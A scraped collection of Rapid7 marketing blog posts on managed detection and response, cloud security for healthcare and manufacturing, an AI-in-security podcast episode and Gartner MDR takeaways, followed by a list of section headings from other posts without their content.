Gain strategic guidance and insights to help take their security program to the next level

You’d Benefit From Automated Processes but Struggle To Implement Them

Automation is the key to boosting your cloud security program and iterating it at scale. For healthcare, automation provides the biggest benefit in ensuring that strict compliance regulations—like HIPAA—are met. That spells good news for stakeholders, who are typically most concerned with meeting standards and maintaining compliance.

With automation, security teams in healthcare can:

Configure guardrails ensuring new assets and environments adhere to regulations and compliance standards
Set up automated alerts that indicate when standards are not met

However, implementing automation, especially if your organization’s new at it, can seem like a hefty investment and a daunting task to accomplish. It’s time to enlist the help of an outsourced SOC if your security teams:

Have limited or no experience with automation
Are still manually handling a lot of rote but necessary tasks
Know where duties get repetitive but don’t know what to do about it

That way, external cyber experts can set up automated guardrails, teach your teams how they work, and eliminate tedious, manual work.

Next Steps With Outsourced SOCs

Organizations with limited resources and novice knowledge of the cloud can significantly benefit from teaming up with managed services. But in a sea of possible partners, knowing which experts to go with can be tough—especially when healthcare organizations have various security needs.

That’s why we built Managed Threat Complete, an always-on MDR with vulnerability management in a single subscription. Consolidate your investment in external SOCs by teaming up with our seasoned security pros today.

Learn More

For more information about healthcare cybersecurity, download our new ebook: In Healthcare (and Security) Early Detection is Key

In this eBook, you’ll learn:

The current state of threats in the healthcare industry
The top challenges in addressing those threats
How to overcome those challenges and implement defense strategies

Download it now!

Rapid7 Recognized as a Strong Performer in The Forrester WaveTM for MDR, Q2 2023

2023-05-18 Jeremiah Dewey

Post Syndicated from Jeremiah Dewey original https://blog.rapid7.com/2023/05/18/rapid7-recognized-as-a-strong-performer-in-the-forrester-wavetm-for-mdr-q2-2023/

Rapid7 Recognized as a Strong Performer in The Forrester WaveTM for MDR, Q2 2023

Rapid7 recognized amongst the top MDR providers in the industry.

As security teams try to do more with less, addressing the sprawling attack surface and monitoring the escalating threat and risk landscape, it inherently leaves them at a disadvantage. Rapid7 Managed Threat Complete empowers organizations to tip the scale back in their favor to achieve stronger security programs, end-to-end.

We are proud to be recognized amongst the top 13 vendors, as a Strong Performer, in The Forrester WaveTM: Managed Detection and Response, Q2 2023. Our goal is to build-upon and break the traditional views of MDR by uniting risk and threat detection and response with Managed Threat Complete to drive superior outcomes for our customers.

Complete Coverage. Single Solution. End-to-End.

Since day one, we’ve continuously been looking for new ways to support organizations in their effort to find and eliminate threats faster and more reliably. While traditional MDR services flooded organizations with noisy alerts and put resolution back on the customer, we saw a better path. Rapid7 is committed to being a true partner for our customers, detecting and responding to any threat, end-to-end, no matter how large or complex.

This year, we focused on empowering all organizations to gain complete coverage, unlocking a holistic security program—one that covers proactive, responsive, and strategic aspects of detection and response. We’ve combined two historically siloed pieces of security (risk and threats) to give organizations the complete picture. By focusing on a security program that is proactive, responsive, and strategic, you get smarter and more resilient over time—continuously strengthening your security.

Like all Rapid7 products and services, Managed Threat Complete is built by practitioners for practitioners. We truly want to empower security teams to focus on strategic work while we focus on their environment 24/7/365. With complete coverage and end-to-end detection and response, teams can feel confident that they’re always ready for what comes next.

Unlimited Incident Response

Traditional approaches to MDR focus on the responsive element of detection and response and miss the opportunity to help organizations build resilience and strengthen their security posture over time. As the market evolved, MDR providers drew lines in the sand. They chose to respond to alerts of a certain size, leaving the burden of hands-on-keyboard incident response (IR) attacks for organizations to handle through expensive retainers or off the street contracts with IR consultants. We knew our customers deserved better, and we had a unique opportunity to challenge the system and provide a fully end-to-end response program.

We’ve removed boundaries to traditional MDR programs, keeping your outcomes our top priority. Rapid7 Managed Threat Complete delivers unlimited data, unlimited incident response, unlimited intelligence, and unlimited potential. From incident response with no limits, meaning no line in the sand regardless of the size and complexity, to XDR technology at the core for complete coverage, threats across your entire modern environment are eliminated.

We believe that in addition to our approach to limitless security, our robust functionality accessibility by customers caused us to receive the highest score in the Platform Capabilities criterion from Forrester.

“This has greatly increased our visibility, detection, and response capabilities for on and off-hours. The UEBA functionality of the agent is amazing as well. Overall the service is extremely valuable and well worth the price.”—Security Administrator/Analyst, Medium Enterprise Insurance Company, TechValidate

Strategic Partnership & Guidance

When it comes to partnership, we truly mean it. Work alongside global SOC experts who seamlessly act as an extension of your team from initial threat detection through triage, investigation, and response. With a Customer Advisor at your fingertips, you can further accelerate your security maturity by working in lockstep to build a strong, resilient program through regular posture reviews and program assessments.

Our MDR SOC provides context and in-depth reporting with every incident. When a forensic analysis is performed, detailed remediation and mitigation recommendations are provided to make sure organizations improve their resilience against threats over time. If a breach becomes a full scope incident response engagement, Rapid7 Incident Response consultants work with the SOC for round the clock forensic investigation, delivering your team answers to remove attackers from your environment as quickly as possible.

Forrester gave Rapid7 the highest possible scores in the Managed Investigations and Threat Hunting criteria. When it comes to threat hunting, we believe in being thorough. Rapid7 performs threat hunting on a hypothesis-driven basis—meaning our analysts (not scripts), proactively perform an analysis as new attacker behavior techniques arise. With 13 months of data stored, we’re able to dig in deep, and ensure our customers aren’t affected by the newest attacker TTPs. If we find something, our team immediately pivots into Incident Response to remove the compromise and reduce negative outcomes.

“Our program has significantly improved and I am much more confident in our overall security posture. Having the Rapid7 Managed Detection and Response team augmenting my team allows us to sleep better at night and be able to leave work knowing that we are still covered and can respond quickly if we receive an alert from the team.”—Scott Chille, CIO or equivalent IT position, Bartlett Regional Hospital, TechValidate

Consolidation for Powerful ROI

When investments are scrutinized and teams are being asked to do more with less, proving the value of a managed detection and response partner is pivotal. Teams are strained, and practitioners need consolidation to drive the efficiency necessary to be successful in today’s modern threat landscape—without sacrificing sophisticated security outcomes and the high standard for their security program. With Managed Threat Complete, organizations can drive greater efficiency and consolidation by unifying vulnerability management and managed detection and response into a single, cohesive security service.

“First off, the IDR platform is solid; great insight into what is going on in our environment. The MDR service gives us great comfort in knowing we have security engineers keeping a watchful eye on your environment as well as a resource for our internal security group. Having our main advisor/POC for monthly check-in ensures we are getting the most value out of the MDR service.”—A CISO/CSO at a Medium Enterprise – Banking, TechValidate

The Future of Detection & Response

As attackers become more pervasive and sophisticated, Rapid7 strives to close the gap for practitioners and their organizations. Our vision is to improve efficiency, efficacy, and productivity to make more sophisticated security outcomes accessible for all teams. These are a few outcomes we are driving toward in the future:

Enhanced Partnership: frictionless access to experts and data where, when, and how customers need it.
More Transparency: Ensure confidence and readiness for the modern environment, including cloud.
Continued Investment in Leading Detections Coverage: Maximize coverage with the Insight Agent. Enhancing endpoint investigation and hunting experience.
Investigation and Response: Empower faster decision making via expanded capabilities and streamlined processes.

Thank you to our customers and partners who continue to be our guiding light for our investments in our service and product. We’re excited to keep pushing the bounds of “traditional” to further empower our customers. We’ll share more around these initiatives and investments throughout the year so keep an eye out.

Rapid7 MDR Program Overview
Rapid7 MDR Buyers Guide
Gartner Market Guide for MDR
MDR vs. The Inevitable

[The Lost Bots] S03E03. The Rise of The Machines

2023-05-11 Amy Hunt

Post Syndicated from Amy Hunt original https://blog.rapid7.com/2023/05/11/the-lost-bots-s03e03-the-rise-of-the-machines/

[The Lost Bots] S03E03. The Rise of The Machines

Artificial Intelligence (AI) is both a profound topic and now, a practical one too: cybersecurity marketers in particular are loving the letters “A” an “I.” But exactly where are we?

Everybody knows an early version of Bing AI spawned a weird personality named “Sidney” and expressed the desire to be both human and destructive. Then there’s that “AI pause” letter almost everybody signed. And now this, from the New York Times: the godfather of AI, Geoffrey Hinton, 75, is leaving Google. He wants to speak freely about the grave dangers he predicts: “It is hard to see how you can prevent the bad actors from using it for bad things.”

A part of him, Hinton said, has come to regret his life’s work.

According to Wired, security researchers are “jailbreaking large language models to get around safety rules.” Our life’s work? Yours? It’s more important than ever. We just might save humanity. But that’s for later…

Separating real and hype about AI and cybersecurity

Rapid7 Detection and Response Practice Advisor Jeffrey Gardner and Stephen Davis, Lead Technical Customer Advisor for MDR may get profound in the future—but this episode is 100% practical and useful right now.

Around the 5:00 mark, they go through exactly how AI is being used in cybersecurity today (and not used, no matter what you hear).

And around the 7:00 mark, heed Gardner’s passionate warning about what you and all your company staff need to think about every time you engage with an AI tool. Every time. In any way. Seriously. Gardner and Stephen are funny, but this warning sure isn’t.

Cloud Security Strategies for Manufacturing

2023-05-03 Rapid7

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/05/03/cloud-security-strategies-for-manufacturing/

Protecting production while supporting growing cloud initiatives

Cloud Security Strategies for Manufacturing

The manufacturing industry is in limbo as organizations shift to cloud services. Many organizations are transitioning services to the cloud, but the vast majority maintain hybrid network environments that lean heavily on on-prem elements. During the pandemic, some companies were forced to expand their cloud services quickly to keep up with an influx of end users accessing network services remotely. However, few manufacturers are really pursuing a cloud-first approach.

This leaves most manufacturing organizations struggling to address issues of visibility in their hybrid cloud environments. There’s also a growing concern about compliance in the industry, with manufacturers setting internal standards to provide crucial oversight for themselves and their third-party partners. All of this is occurring during an industry-wide push to implement smart factory initiatives and a persistent IT/OT skills gap in manufacturing organizations.

An effective cloud security strategy is key for manufacturing companies. As they transition their services, implementing cloud security will ensure they’re able to monitor their growing attack surfaces, establish the necessary auditing processes and assessments for compliance, and support smart factory initiatives.

Major challenges of cloud security in manufacturing

Ensuring consistent production is paramount for manufacturing organizations. Cloud security strategy for this industry enables hybrid networks to function without disruption, while still supporting developing compliance regulations and smart factory initiatives. Without an effective cloud security strategy, manufacturers jeopardize their entire hybrid network as well as the operational elements and software integral to their manufacturing processes. Let’s look at a few of the obstacles keeping manufacturers from implementing an effective cloud security strategy.

Lack of visibility into the cloud

The manufacturing industry is unique in that organizations are not only monitoring an environment populated with their own cloud and on-prem elements, but they’re also tasked with tracking the elements of the third-party vendors that they partner with. These additional endpoints increase the overall attack surface and can be tricky to secure.

Lack of visibility into the cloud applications and elements in a manufacturing company’s network impacts root-cause analysis, anomaly detection, and the other processes that affect availability, performance, and security across the entire network.

Network disruptions often translate to supply chain issues that can affect production and availability. This ultimately translates to lost revenue and negatively impacts a manufacturer’s brand reputation. In fact, in a Supply Chain Resilience Report, 16.7% of business owners reported a “severe loss of income” due to a supply chain disruption. The report also revealed that the average cost of a disruption was around $610,000 dollars. Cloud security strategy, then, should include visibility across the entire infrastructure as well as third-party dependencies and the necessary context to bring clarity to third-party risk.

Failure to achieve and maintain cloud compliance

Unlike other highly regulated industries like healthcare and financial services, manufacturing organizations don’t have much external guidance when it comes to cloud compliance. In the absence of government regulation, manufacturing companies need a way to validate network configurations and changes in their cloud applications and infrastructure.

The lack of compliance standards for cloud applications prevents many manufacturers from properly deploying cloud-controlled elements, as well as detecting and remediating issues. This leads to system-wide vulnerabilities and greater exposure in the threat landscape. For example, without proper compliance standards in place, an organization may fail to update their service-level agreements (SLAs) or security patches in their cloud environments, which can be exploited by malicious threat actors.

Manufacturing organizations require a cloud security strategy that includes automated detection and remediation assistance, as well as support in adopting and implementing the few regulatory recommendations available, such as those set forth by the National Institute of Standards and Technology (NIST).

Inability to bridge the IT/OT knowledge gap

According to a Gartner survey, 64% of IT executives view talent shortages as the most significant barrier to adoption of emerging technologies. In the manufacturing industry, this translates specifically to a lack of IT/OT specialist knowledge on network teams.

IT/OT refers to the integration of information technology (IT) systems with operational technology (OT) systems. This particular combination of systems is used by manufacturing organizations to balance cloud network infrastructure that controls information and data with industrial equipment, assets, and processes.

Without specialist knowledge of these systems and how they interact, manufacturers struggle with IT and OT silos that lead to system disruption, downtime, and increased vulnerability. Manufacturers often misunderstand that OT systems are critical to their production process, but not necessarily the source of risk in their infrastructure. IT systems, however, may represent a smaller point of entry to their system, but pose a much larger risk as they connect to the larger OT systems. To combat this, manufacturers need a toolkit that will fill this skill gap on their teams, automate processes for increased efficiency, and consolidate data to break down silos between teams.

Where to start with a cloud security strategy in manufacturing

When looking to build a strong cloud security strategy, manufacturers should focus their efforts in the following areas:

Visibility
Compliance
Managed Services

Prioritize cloud visibility

Though the transition to cloud services is slower in the manufacturing industry, it is still an inevitability. Consequently, the best way for manufacturing organizations to adequately protect their cloud infrastructure, and by extension their overall environment, is to focus on visibility.

Visibility reduces risk and allows companies to effectively monitor their attack surfaces. This begins with manufacturers collecting monitoring data from across their cloud infrastructure. Drawing connections between the data, end-user experiences, and supply chain interaction can help manufacturers find weak or vulnerable points in their cloud infrastructure.

The right cloud security tools will help teams continuously monitor both public cloud and container environments. Manufacturers also need real-time visibility and context to find and fix issues quickly. InsightCloudSec offers all of these features and more to manufacturing companies—effectively eliminating network blind spots and giving teams the confidence they need to move forward with their cloud initiatives.

Consider cloud compliance solutions

Many manufacturers struggle with finding and adopting regulatory best practices in their cloud environments. While NIST offers guidance on network security, and the Center for Internet Security (CIS) offers frameworks and CIS Benchmarks, many manufacturers are unsure of which guidelines make the most sense for their organization’s needs. Moreover, manufacturers need guidance on how to implement compliance monitoring, which ensures that their cloud elements are operating securely.

Without compliance, manufacturers are essentially managing their cloud environments in the dark, with little governance on how to deploy applications, configure their cloud environments, and update their elements. This can lead to lapsed security updates and serious vulnerabilities that increase risk across the entire infrastructure.

Enter cloud compliance solutions. These tools can enable manufacturing organizations to automate compliance monitoring and management. For example, InsightCloudSec checks an organization’s multi-cloud environments against dozens of industry and regulatory best practices. Moreover, cloud compliance solutions enable manufacturers to customize external compliance checks to sync with internal compliance regulations. This eliminates frustration and false alarms.

Teams can also take advantage of InsightCloudSec’s embedded automation, which automatically detects compliance drift and returns cloud environments to a secure state within 60 seconds.

Outsource with managed services

Manufacturing teams struggling to hire and retain skilled IT workers often find themselves with a gap in IT/OT oversight. This gap can result in greater silos between IT and OT teams, which can disrupt smart factory initiatives and the adoption of cloud services, and lead to increased unchecked system vulnerabilities.

After all, it’s hard to contextualize risk without a complete understanding of IT/OT cloud elements and how risk in one arena affects the other. Instead of an organization redoubling their hiring efforts or overwhelming their existing team members, managed services allow manufacturers to effectively outsource this role and add a virtual IT/OT specialist to their team.

Rapid7’s managed services team offers regular assessments, handles the operational requirements of incident detection and response, and performs vulnerability scanning. This frees up crucial time for IT/OT teams and streamlines the scanning and reporting process, which encourages greater collaboration. Contextualization, or the process of analyzing threats and gathering relevant supplemental information, is simple with Rapid7’s InsightVM. InsightVM works in partnership with SCADAfence to assess vulnerabilities and leverage insight into OT networks to accurately prioritize risk.

The bottom line

Establishing cloud security strategies in manufacturing organizations often seems like an insurmountable task. Common struggles of visibility, compliance, and IT/OT knowledge gaps plague manufacturing companies who are transitioning to cloud services. This can lead to network blind spots, slowdowns, and increased risk.

Building a toolkit of cloud security solutions can help manufacturers reduce their overall risk in the cloud and optimize their performance by improving internal compliance. Making the most of this toolkit requires specialized knowledge, but leveraging managed services enables manufacturing organizations to streamline reporting and assessments without hiring additional in-house staff.

Manufacturing organizations are evolving to keep up with production demands, changing technology, and an ever-broadening threat landscape. By strengthening cloud security, manufacturing companies can focus on providing a superb product, assured that their cloud environment is secure. Get in touch with us to learn more about how Rapid7 is helping manufacturing companies navigate security during every phase of the cloud transition process.

Three Takeaways from the Gartner® Market Guide for Managed Detection and Response Services

2023-05-02 Tom Caiazza

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2023/05/02/three-takeaways-from-the-gartner-r-market-guide-for-managed-detection-and-response-services/

Three Takeaways from the Gartner® Market Guide for Managed Detection and Response Services

Not all MDR services are created equal, and in order for organizations to find the right partner for their managed detection and response needs, Gartner® has published a Market Guide report offering key insights for businesses of all sizes. At Rapid7, we are proud to offer this complimentary report and share our three key takeaways from it.

MDR services have skyrocketed over the past few years. In the report, Gartner says: “MDR is a high-growth, established market (see Market Share: Managed Security Services, Worldwide, 2021 where MDR is a distinct segment, the MDR market grew 48.9% from 2020 to 2021).”

Because of the high growth in the market, many managed security services use the term MDR. However, organizations looking for a true Managed Detection and Response partner, should look to the Gartner definition to identify the right vendor.

Gartner puts it this way: “MDR services provide customers with remotely delivered, humanled, turnkey, modern SOC functions; ultimately delivering threat disruption and containment.”

But choosing a strong MDR partner goes far beyond these high-level requirements. Below are our key takeaways from the report. Without further ado, let’s dive right in.

Takeaway 1: Beware Providers Mimicking MDR

The key to MDR lies as much in the human-centric nature of the service as the power of the technology behind it. Managed Detection and Response is just that… managed. It requires a human with expertise not only in understanding the detection and remediation of threats and breaches, but how these correlate to your business and its goals. Sadly, not all services claiming to be MDR lead with this human expertise.

Gartner shares: “Misnamed technology-centric offerings and vendor-delivered service wrappers (VDSW), that fail to deliver human-driven managed detection and response (MDR) services, are causing challenges for buyers looking to identify and select an outcome-driven provider.”

Human-analyzed context is critically important to the success of an MDR program and an organization’s outcomes in their security programs. Unfortunately, some providers are not living up to their own marketing materials. For instance, Gartner found that some “deliver a far less human-driven experience, depending on the technology for the bulk of the delivery. Although still valuable, these offerings are often promoted as being more engaged than they actually are and would be better described as managed EDR (MEDR).”

Takeaway 2: Context is King

This could be considered a corollary to the previous takeaway, but we acknowledge how important it is for an MDR provider to understand your organization’s unique environment, the context of threats, and how those threats have potential to impact your business. It is not enough to simply detect and remediate threats; an MDR SOC should understand which threats and types of threats will have the biggest impact on your company or organization.

The human-led nature of successful MDR programs means that a company can rest assured that their MDR SOC is able to provide insights that are actually useful to boost their customer’s outcomes.

Gartner has this to say on the subject: “MDR buyers must focus on the ability to provide context-driven insights that will directly impact their business objectives, as wide-scale collection of telemetry and automated analysis are insufficient when facing uncommon threats.”

We feel this has a direct relationship with the expertise of the MDR provider and the quality of the technology they are providing. Too much information without the context necessary to triage and prioritize could overwhelm any security team. Too little information and threats go unchecked. Finding the right balance between the tech and expertise is critical.

Takeaway 3: Threats Know No Boundaries

Ok, that subhead may be a little hyperbolic, but it should surprise no one that threat actors aren’t clocking out at 5pm on a Friday and taking holidays off. Your MDR SOC can’t either. Gartner recommends “Use MDR services to obtain 24/7, remotely delivered, human-led security operations capabilities when there are no existing internal capabilities, or when the organization needs to accelerate or augment existing security operations capabilities.”

So, what exactly does that mean? Essentially, any MDR SOC you choose should provide round-the-clock security that knows no geographical limitations, and has a team of experts actively detecting, assessing, and providing remediation recommendations for threats whenever they arise.

Gartner says: “Turnkey threat detection, investigation and response (TDIR) capabilities are a core requirement for buyers of MDR services who demand remotely delivered services deployed quickly and predictably.”

A follow-the-sun approach that puts highly competent security experts at your fingertips 24/7, 365, and that melds the human-centric nature of deep cybersecurity and business analysis with a powerful threat-detecting technology solution would make for a compelling MDR service option.

Choosing an MDR partner requires some serious due diligence and understanding of your organization’s priorities. This Market Guide helps MDR buyers understand the state of the market and what to look for in an effective MDR provider. Our three takeaways are in no way comprehensive; download the full report to learn more.

Gartner, “Market Guide for Managed Detection and Response Services” Pete Shoard, Al Price, Mitchell Schneider, Craig Lawson, Andrew Davies. 14 February 2023.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

MSIX Installers

Technical Analysis

Typo Squatted Malvertising

PowerShell Scripts

RAR Contents

The IDAT Loader

Rapid7 Customers

MITRE ATT&CK Techniques

IOCs

References

Anticipate Imminent Threats Across Your Environment

Monitor, remediate, and takedown threats with Managed Digital Risk Protection (DRP)

Ensure safe AI development in the cloud with Rapid7 AI/ML Security Best Practices

Stay ahead of emerging threats with insights and guidance from Rapid7 Labs

Pinpoint Critical and Actionable Insights to Effectively and Confidently Respond

Introducing the newest tier of Managed Threat Complete

Get to the data you need faster with new Log Search and Investigation features in InsightIDR

Easily view vital cloud alert context with Simplified Cloud Threat Alerts

A growing library of actionable detections in InsightIDR

Stay tuned!

Technical Analysis

Stage 1: The drive by

Binary Analysis: Shaking off the Rust

IDAT Loader

Post-Exploitation: BRC4 Deployment

Rapid7 Customers

Appendix A: Known Sandbox Usernames and Analysis Tools

MITRE ATT&CK Techniques

IOCs

References

Rapid7 customers

Observed Attacker Behavior

Mitigation guidance

MITRE ATT&CK Techniques

Indicators of Compromise

24×7 Immediate Containment of Validated Threats with Active Response

See How Active Response Stopped Malware in a Recent Rapid7 MDR Investigation

Build Resilience While You Sleep

Rapid7 MDR: Full coverage, single trusted partner

Looking Ahead: Proactive Ransomware Prevention

Let’s walk through a potential scenario with InsightIDR and Velociraptor

Observed attacker behavior

Dark web activity

Indicators of compromise

Mitigation guidance

Your Teams Are Already Overwhelmed

You’re Super New to the Cloud

You’d Benefit From Automated Processes but Struggle To Implement Them

Next Steps With Outsourced SOCs

Learn More

Complete Coverage. Single Solution. End-to-End.

Unlimited Incident Response

Strategic Partnership & Guidance

Consolidation for Powerful ROI

The Future of Detection & Response

Related resources

Separating real and hype about AI and cybersecurity

Protecting production while supporting growing cloud initiatives

Major challenges of cloud security in manufacturing

Lack of visibility into the cloud

Failure to achieve and maintain cloud compliance

Inability to bridge the IT/OT knowledge gap

Where to start with a cloud security strategy in manufacturing

Prioritize cloud visibility

Consider cloud compliance solutions

Outsource with managed services

The bottom line

Takeaway 1: Beware Providers Mimicking MDR

Takeaway 2: Context is King

Takeaway 3: Threats Know No Boundaries

The collective thoughts of the interwebz